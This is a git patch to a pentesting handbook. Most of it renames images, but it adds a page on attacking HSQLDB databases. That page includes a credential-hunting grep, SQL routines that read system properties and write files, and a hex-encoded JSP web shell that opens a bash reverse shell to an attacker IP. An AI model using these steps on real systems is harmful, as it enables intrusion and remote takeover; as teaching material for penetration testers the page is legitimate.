From adba221295ce90df97efe05466d56476ecd646da Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Wed, 2 Dec 2020 23:18:31 +0000
Subject: [PATCH] GitBook: [master] 20 pages and 40 assets modified

---
 .gitbook/assets/{1.png => 1 (2) (1).png}      | Bin
 ...2616e67655f696d672e706e67 (6) (4) (1).png} | Bin
 ...2616e67655f696d672e706e67 (6) (4) (2).png} | Bin
 ...2616e67655f696d672e706e67 (6) (4) (3).png} | Bin
 ...2616e67655f696d672e706e67 (6) (4) (4).png} | Bin
 ...2616e67655f696d672e706e67 (6) (4) (5).png} | Bin
 ...2616e67655f696d672e706e67 (6) (4) (6).png} | Bin
 ... (107) (1).png => image (107) (2) (1).png} | Bin
 ...mage (107).png => image (107) (2) (2).png} | Bin
 ...mage (121).png => image (121) (1) (1).png} | Bin
 ...mage (172).png => image (172) (1) (1).png} | Bin
 ...mage (207).png => image (207) (1) (1).png} | Bin
 ...mage (215).png => image (215) (1) (1).png} | Bin
 ...mage (227).png => image (227) (1) (1).png} | Bin
 ...mage (254).png => image (254) (1) (1).png} | Bin
 ...mage (314).png => image (314) (1) (1).png} | Bin
 ... (345) (1).png => image (345) (2) (1).png} | Bin
 ...mage (345).png => image (345) (2) (2).png} | Bin
 ...der4 (1).gif => intruder4 (1) (1) (1).gif} | Bin
 ...{poison (1).jpg => poison (1) (1) (1).jpg} | Bin
 1911-pentesting-fox.md                        |   2 +-
 README.md                                     |   2 +-
 SUMMARY.md                                    |   1 +
 exploiting/reversing.md                       |   2 +-
 .../linux-privilege-escalation-checklist.md   |   2 +-
 .../android-app-pentesting/apk-decompilers.md |   2 +-
 .../drozer-tutorial/README.md                 |   6 +-
 .../exploiting-content-providers.md           |   4 +-
 mobile-apps-pentesting/android-checklist.md   |   2 +-
 pentesting-methodology.md                     |   2 +-
 ...ava-dns-deserialization-and-gadgetprobe.md |   2 +-
 .../unicode-normalization-vulnerability.md    |   2 +-
 pentesting/9001-pentesting-hsqldb.md          |  80 ++++++++++++++++++
 ...-ns-mdns-dns-and-wpad-and-relay-attacks.md |   2 +-
 .../pentesting-network/wifi-attacks/README.md |   2 +-
 pentesting/pentesting-web/drupal.md           |   2 +-
 pentesting/pentesting-web/wordpress.md        |   2 +-
 .../active-directory-methodology/README.md    |   2 +-
 ...rivileged-accounts-and-token-privileges.md |   2 +-
 .../checklist-windows-privilege-escalation.md |   2 +-
 40 files changed, 102 insertions(+), 21 deletions(-)
 rename .gitbook/assets/{1.png => 1 (2) (1).png} (100%)
 rename .gitbook/assets/{68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (1).png => 68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1).png} (100%)
 rename .gitbook/assets/{68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (2).png => 68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (2).png} (100%)
 rename .gitbook/assets/{68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (3).png => 68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png} (100%)
 rename .gitbook/assets/{68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (5).png => 68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png} (100%)
 rename .gitbook/assets/{68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (6).png => 68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png} (100%)
 rename .gitbook/assets/{68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6).png => 68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6).png} (100%)
 rename .gitbook/assets/{image (107) (1).png => image (107) (2) (1).png} (100%)
 rename .gitbook/assets/{image (107).png => image (107) (2) (2).png} (100%)
 rename .gitbook/assets/{image (121).png => image (121) (1) (1).png} (100%)
 rename .gitbook/assets/{image (172).png => image (172) (1) (1).png} (100%)
 rename .gitbook/assets/{image (207).png => image (207) (1) (1).png} (100%)
 rename .gitbook/assets/{image (215).png => image (215) (1) (1).png} (100%)
 rename .gitbook/assets/{image (227).png => image (227) (1) (1).png} (100%)
 rename .gitbook/assets/{image (254).png => image (254) (1) (1).png} (100%)
 rename .gitbook/assets/{image (314).png => image (314) (1) (1).png} (100%)
 rename .gitbook/assets/{image (345) (1).png => image (345) (2) (1).png} (100%)
 rename .gitbook/assets/{image (345).png => image (345) (2) (2).png} (100%)
 rename .gitbook/assets/{intruder4 (1).gif => intruder4 (1) (1) (1).gif} (100%)
 rename .gitbook/assets/{poison (1).jpg => poison (1) (1) (1).jpg} (100%)
 create mode 100644 pentesting/9001-pentesting-hsqldb.md

diff --git a/.gitbook/assets/1.png b/.gitbook/assets/1 (2) (1).png
similarity index 100%
rename from .gitbook/assets/1.png
rename to .gitbook/assets/1 (2) (1).png
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (1).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1).png
similarity index 100%
rename from .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (1).png
rename to .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1).png
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (2).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (2).png
similarity index 100%
rename from .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (2).png
rename to .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (2).png
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (3).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png
similarity index 100%
rename from .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (3).png
rename to .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (5).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png
similarity index 100%
rename from .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (5).png
rename to .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (6).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png
similarity index 100%
rename from .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (6).png
rename to .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png
diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6).png
similarity index 100%
rename from .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6).png
rename to .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (6).png
diff --git a/.gitbook/assets/image (107) (1).png b/.gitbook/assets/image (107) (2) (1).png
similarity index 100%
rename from .gitbook/assets/image (107) (1).png
rename to .gitbook/assets/image (107) (2) (1).png
diff --git a/.gitbook/assets/image (107).png b/.gitbook/assets/image (107) (2) (2).png
similarity index 100%
rename from .gitbook/assets/image (107).png
rename to .gitbook/assets/image (107) (2) (2).png
diff --git a/.gitbook/assets/image (121).png b/.gitbook/assets/image (121) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (121).png
rename to .gitbook/assets/image (121) (1) (1).png
diff --git a/.gitbook/assets/image (172).png b/.gitbook/assets/image (172) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (172).png
rename to .gitbook/assets/image (172) (1) (1).png
diff --git a/.gitbook/assets/image (207).png b/.gitbook/assets/image (207) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (207).png
rename to .gitbook/assets/image (207) (1) (1).png
diff --git a/.gitbook/assets/image (215).png b/.gitbook/assets/image (215) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (215).png
rename to .gitbook/assets/image (215) (1) (1).png
diff --git a/.gitbook/assets/image (227).png b/.gitbook/assets/image (227) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (227).png
rename to .gitbook/assets/image (227) (1) (1).png
diff --git a/.gitbook/assets/image (254).png b/.gitbook/assets/image (254) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (254).png
rename to .gitbook/assets/image (254) (1) (1).png
diff --git a/.gitbook/assets/image (314).png b/.gitbook/assets/image (314) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (314).png
rename to .gitbook/assets/image (314) (1) (1).png
diff --git a/.gitbook/assets/image (345) (1).png b/.gitbook/assets/image (345) (2) (1).png
similarity index 100%
rename from .gitbook/assets/image (345) (1).png
rename to .gitbook/assets/image (345) (2) (1).png
diff --git a/.gitbook/assets/image (345).png b/.gitbook/assets/image (345) (2) (2).png
similarity index 100%
rename from .gitbook/assets/image (345).png
rename to .gitbook/assets/image (345) (2) (2).png
diff --git a/.gitbook/assets/intruder4 (1).gif b/.gitbook/assets/intruder4 (1) (1) (1).gif
similarity index 100%
rename from .gitbook/assets/intruder4 (1).gif
rename to .gitbook/assets/intruder4 (1) (1) (1).gif
diff --git a/.gitbook/assets/poison (1).jpg b/.gitbook/assets/poison (1) (1) (1).jpg
similarity index 100%
rename from .gitbook/assets/poison (1).jpg
rename to .gitbook/assets/poison (1) (1) (1).jpg
diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md
index 44046fec8..5864e38da 100644
--- a/1911-pentesting-fox.md
+++ b/1911-pentesting-fox.md
@@ -10,7 +10,7 @@ dht udp "DHT Nodes"
 
 ![](.gitbook/assets/image%20%28182%29.png)
 
-![](.gitbook/assets/image%20%28345%29%20%282%29.png)
+![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29.png)
 
 InfluxDB
 
diff --git a/README.md b/README.md
index 36a17486c..b6459ddcc 100644
--- a/README.md
+++ b/README.md
@@ -20,7 +20,7 @@ Don't forget to **give ⭐ on the github** to motivate me to continue developing
 
 
 
-![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%286%29.png)
+![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)
 
 [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
 
diff --git a/SUMMARY.md b/SUMMARY.md
index bdf247094..912eae532 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -274,6 +274,7 @@
 * [6379 - Pentesting Redis](pentesting/6379-pentesting-redis.md)
 * [8009 - Pentesting Apache JServ Protocol \(AJP\)](pentesting/8009-pentesting-apache-jserv-protocol-ajp.md)
 * [8089 - Splunkd](pentesting/8089-splunkd.md)
+* [9001 - Pentesting HSQLDB](pentesting/9001-pentesting-hsqldb.md)
 * [9042/9160 - Pentesting Cassandra](pentesting/cassandra.md)
 * [9100 - Pentesting Raw Printing \(JetDirect, AppSocket, PDL-datastream\)](pentesting/9100-pjl.md)
 * [9200 - Pentesting Elasticsearch](pentesting/9200-pentesting-elasticsearch.md)
diff --git a/exploiting/reversing.md b/exploiting/reversing.md
index 6c62e8cb3..8b9ee65c1 100644
--- a/exploiting/reversing.md
+++ b/exploiting/reversing.md
@@ -45,7 +45,7 @@ DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
 
 And click on **compile**:
 
-![](../.gitbook/assets/image%20%28314%29.png)
+![](../.gitbook/assets/image%20%28314%29%20%281%29.png)
 
 Then save the new file on _**File &gt;&gt; Save module...**_:
 
diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-unix/linux-privilege-escalation-checklist.md
index 72d8eced9..cc83b31ef 100644
--- a/linux-unix/linux-privilege-escalation-checklist.md
+++ b/linux-unix/linux-privilege-escalation-checklist.md
@@ -146,7 +146,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
 If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.  
 Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
 
-![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29.png)
+![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png)
 
 ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
 
diff --git a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md
index 667429a6a..0803b1a50 100644
--- a/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md
+++ b/mobile-apps-pentesting/android-app-pentesting/apk-decompilers.md
@@ -36,7 +36,7 @@ GDA is also a powerful and fast reverse analysis platform. Which does not only s
 
 **Only for Windows.**
 
-![](../../.gitbook/assets/image%20%28207%29.png)
+![](../../.gitbook/assets/image%20%28207%29%20%281%29.png)
 
 ### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)
 
diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/README.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/README.md
index c64e76965..9a434dafa 100644
--- a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/README.md
+++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/README.md
@@ -112,7 +112,7 @@ Attack Surface:
 
 ### Activities
 
-An exported activity  component’s “android:exported” value is set to **“true”** in the AndroidManifest.xml file:
+An exported activity component’s “android:exported” value is set to **“true”** in the AndroidManifest.xml file:
 
 ```markup
 <activity android:name="com.my.app.Initial" android:exported="true">
@@ -187,7 +187,7 @@ Take a look to the **drozer** help for `app.service.send`:
 
 ![](../../../.gitbook/assets/image%20%2830%29.png)
 
-Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where.   
+Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where.  
 Using the `--extra` option you can send something interpreted by "_msg.replyTo"_, and using `--bundle-as-obj` you create and object with the provided details.
 
 In the following example:
@@ -278,7 +278,7 @@ run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --compo
 ### Is debuggeable
 
 A prodduction APK should never be debuggeable.  
-This mean that you can **attach java debugger** to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them.[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) on digging deeper when you application is debuggable and injecting runtime code. 
+This mean that you can **attach java debugger** to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them.[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) on digging deeper when you application is debuggable and injecting runtime code.
 
 When an application is debuggable, it will appear in the Manifest:
 
diff --git a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
index 9c3fbc4a0..1cfb83f09 100644
--- a/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
+++ b/mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
@@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/
 
 You should also check the **ContentProvider code** to search for queries: 
 
-![](../../../.gitbook/assets/image%20%28121%29%20%281%29.png)
+![](../../../.gitbook/assets/image%20%28121%29%20%281%29%20%281%29.png)
 
 Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
 
@@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
 
 ![](../../../.gitbook/assets/image%20%28211%29.png)
 
-![](../../../.gitbook/assets/image%20%28254%29%20%281%29.png)
+![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29.png)
 
 Because you will be able to call them
 
diff --git a/mobile-apps-pentesting/android-checklist.md b/mobile-apps-pentesting/android-checklist.md
index f32fa8181..5de26c7cc 100644
--- a/mobile-apps-pentesting/android-checklist.md
+++ b/mobile-apps-pentesting/android-checklist.md
@@ -60,7 +60,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
 If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.  
 Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
 
-![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29.png)
+![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29.png)
 
 ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
 
diff --git a/pentesting-methodology.md b/pentesting-methodology.md
index 9da609e8e..1fbf53de5 100644
--- a/pentesting-methodology.md
+++ b/pentesting-methodology.md
@@ -132,7 +132,7 @@ Check also the page about [**NTLM**](windows/ntlm/), it could be very useful to
 * [**CBC-MAC**](crypto/cipher-block-chaining-cbc-mac-priv.md)
 * [**Padding Oracle**](crypto/padding-oracle-priv.md)
 
-![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%281%29.png)
+![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%281%29.png)
 
 ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
 
diff --git a/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
index 5d14871f9..3cec66ef6 100644
--- a/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
+++ b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
@@ -149,7 +149,7 @@ You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) fro
 
 Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) ****with Java classes for being tested.
 
-![](../../.gitbook/assets/intruder4%20%281%29%20%281%29.gif)
+![](../../.gitbook/assets/intruder4%20%281%29%20%281%29%20%281%29.gif)
 
 ### More Information
 
diff --git a/pentesting-web/unicode-normalization-vulnerability.md b/pentesting-web/unicode-normalization-vulnerability.md
index ead3b02c4..26f0e4a01 100644
--- a/pentesting-web/unicode-normalization-vulnerability.md
+++ b/pentesting-web/unicode-normalization-vulnerability.md
@@ -76,7 +76,7 @@ You could use one of the following characters to trick the webapp and exploit a
 
 Notice that for example the first Unicode character purposed can be sent as: `%e2%89%ae` or as `%u226e`
 
-![](../.gitbook/assets/image%20%28215%29.png)
+![](../.gitbook/assets/image%20%28215%29%20%281%29.png)
 
 ## References
 
diff --git a/pentesting/9001-pentesting-hsqldb.md b/pentesting/9001-pentesting-hsqldb.md
new file mode 100644
index 000000000..58369b26e
--- /dev/null
+++ b/pentesting/9001-pentesting-hsqldb.md
@@ -0,0 +1,80 @@
+# 9001 - Pentesting HSQLDB
+
+## Basic Information
+
+HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\) is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes.
+
+**Default port:** 9001
+
+```text
+9001/tcp open  jdbc      HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
+```
+
+## Information
+
+#### Default Settings
+
+Note that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges.
+
+Default credentials are usually `sa` with a blank password.
+
+If you’ve exploited another service, search for possible credentials using
+
+```text
+grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
+```
+
+Note the database name carefully - you’ll need it to connect.
+
+## Info Gathering
+
+Connect to the DB instance by [downloading HSQLDB](https://sourceforge.net/projects/hsqldb/files/) and extracting `hsqldb/lib/hsqldb.jar`. Run the GUI app \(eww\) using `java -jar hsqldb.jar` and connect to the instance using the discovered/weak credentials.
+
+Note the connection URL will look something like this for a remote system: `jdbc:hsqldb:hsql://ip/DBNAME`.
+
+## Tricks
+
+### Java Language Routines
+
+We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the application’s classpath.
+
+JRTs can be `functions` or `procedures`. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the `VALUES` statement.
+
+If the Java method we want to call returns void, we need to use a procedure invoked with the `CALL` statement.
+
+### Reading Java System Properties
+
+Create function:
+
+```text
+CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
+DETERMINISTIC NO SQL
+EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
+```
+
+Execute function:
+
+```text
+VALUES(getsystemproperty('user.name'))
+```
+
+You can find a [list of system properties here](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).
+
+### Write Content to File
+
+You can use the `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget located in the JDK \(auto loaded into the class path of the application\) to write hex-encoded items to disk via a custom procedure. **Note the maximum size of 1024 bytes**.
+
+Create procedure:
+
+```text
+CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
+LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
+'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
+```
+
+Execute procedure:
+
+```text
+call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
+```
+
diff --git a/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
index a77e2e352..1fb62e7fd 100644
--- a/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
+++ b/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
@@ -45,7 +45,7 @@ responder -I <Iface> --wpad
 
 Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" \(most probably a **NTLMv2 Challenge/Response**\):
 
-![](../../.gitbook/assets/poison%20%281%29.jpg)
+![](../../.gitbook/assets/poison%20%281%29%20%281%29.jpg)
 
 ## **Inveigh**
 
diff --git a/pentesting/pentesting-network/wifi-attacks/README.md b/pentesting/pentesting-network/wifi-attacks/README.md
index a13b593da..ba8fcfb27 100644
--- a/pentesting/pentesting-network/wifi-attacks/README.md
+++ b/pentesting/pentesting-network/wifi-attacks/README.md
@@ -329,7 +329,7 @@ _Note that as the client was deauthenticated it could try to connect to a differ
 
 Once in the `airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening:
 
-![](../../../.gitbook/assets/image%20%28172%29.png)
+![](../../../.gitbook/assets/image%20%28172%29%20%281%29.png)
 
 Once the handshake is captured you can **crack** it with `aircrack-ng`:
 
diff --git a/pentesting/pentesting-web/drupal.md b/pentesting/pentesting-web/drupal.md
index 8297c3235..93eb6726f 100644
--- a/pentesting/pentesting-web/drupal.md
+++ b/pentesting/pentesting-web/drupal.md
@@ -24,7 +24,7 @@ Accessing _/user/&lt;number&gt;_ you can see the number of existing users, in th
 
 ![](../../.gitbook/assets/image%20%2826%29.png)
 
-![](../../.gitbook/assets/image%20%28227%29.png)
+![](../../.gitbook/assets/image%20%28227%29%20%281%29.png)
 
 ## Hidden pages enumeration
 
diff --git a/pentesting/pentesting-web/wordpress.md b/pentesting/pentesting-web/wordpress.md
index 5c7b47b34..919054def 100644
--- a/pentesting/pentesting-web/wordpress.md
+++ b/pentesting/pentesting-web/wordpress.md
@@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
 </methodCall>
 ```
 
-![](../../.gitbook/assets/image%20%28107%29.png)
+![](../../.gitbook/assets/image%20%28107%29%20%282%29.png)
 
 ![](../../.gitbook/assets/image%20%28224%29.png)
 
diff --git a/windows/active-directory-methodology/README.md b/windows/active-directory-methodology/README.md
index 316d5d324..9282b9e47 100644
--- a/windows/active-directory-methodology/README.md
+++ b/windows/active-directory-methodology/README.md
@@ -396,7 +396,7 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s
 
 
 
-![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%282%29.png)
+![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%282%29.png)
 
 ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
 
diff --git a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md
index 56b6b65b8..de64c241d 100644
--- a/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md
+++ b/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md
